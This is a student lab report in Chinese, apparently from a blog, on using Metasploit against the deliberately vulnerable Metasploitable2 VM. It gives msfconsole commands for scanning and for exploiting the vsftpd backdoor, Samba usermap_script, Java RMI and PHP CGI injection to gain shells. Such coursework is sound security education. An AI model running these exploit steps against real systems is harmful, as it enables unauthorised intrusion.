20222311 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容
1.1 本周学习内容回顾
使用了Metasploit框架,其是一个功能强大的渗透测试框架。在使用的过程当中,Metasploit 提供了种类繁多的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。
其次还使用了一些信息收集的工具,如nmap,Nessus等,用于漏洞检测、信息收据等操作。

1.2 实验要求
本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成实验内容。
查询靶机IP地址,得到结果为192.168.134.142

2.实验过程
2.1 前期渗透
2.1.1 主机发现
(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.134.0/24
set THREADS 30
run

成功查询到靶机(192.168.134.142)
2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set RHOSTS 192.168.134.142
run


成功扫描出开放的tcp端口。
2.1.3 扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.134.142
run

目标主机运行的是一个较旧的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.134.142
exploit
run攻击成功执行后,再输入uname –a、 pwd、 id等命令 验证。


2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.134.142

利用成功 执行uname–a验证

2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
首先查看1099端口是否打开

根据之前的TCP扫描结果,可以看出1099端口是开放的。
search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.134.142
exploit

运行成功,输入shell
利用whoami命令验证,得到结果root。

2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.134.142
exploit

攻击成功,输入dir验证。

3.问题及解决方案
问题一:一开始kali虚拟机无法ping通靶机
解决方案:把两个虚拟机的网络适配器都设置为NAT模式
4.学习感悟、思考等

  • 通过这次网络攻防实验,我深刻体会到了网络安全的重要性以及攻防技术的复杂性。实验中,我们从基础的主机发现和端口扫描开始,逐步深入到具体的漏洞利用,每一个步骤都让我对网络安全有了更深入的认识。
  • 首先,主机发现和端口扫描是渗透测试的基础,它们帮助我们了解目标网络的布局和开放的服务。这些信息对于后续的漏洞扫描和利用至关重要。使用工具如nmap进行端口扫描,不仅可以发现开放的端口,还可以识别运行在这些端口上的服务及其版本信息,为后续的漏洞分析提供线索。
  • 接着,我们接触到了具体的漏洞利用。Vsftpd后门漏洞、SambaMS-RPC Shell命令注入漏洞、Java RMI SERVER命令执行漏洞以及PHP CGI参数执行注入漏洞,每一个漏洞都展示了不同服务在设计或配置上的安全缺陷。这些漏洞的存在,不仅威胁到了信息系统的安全,也提醒我们作为网络空间安全专业的学生,需要不断地更新知识,跟进最新的安全动态。
  • 在实际操作中,我学会了如何使用Metasploit框架来利用这些漏洞。Metasploit的强大功能让我能够快速地找到并利用漏洞,但同时也让我意识到,这样的工具如果落入恶意攻击者手中,后果将不堪设想。因此,安全防御不仅要关注技术层面,还要加强对攻击工具的管理和控制。
posted @ 2024-11-16 21:00  Petrichor666  阅读(8)  评论(0编辑  收藏  举报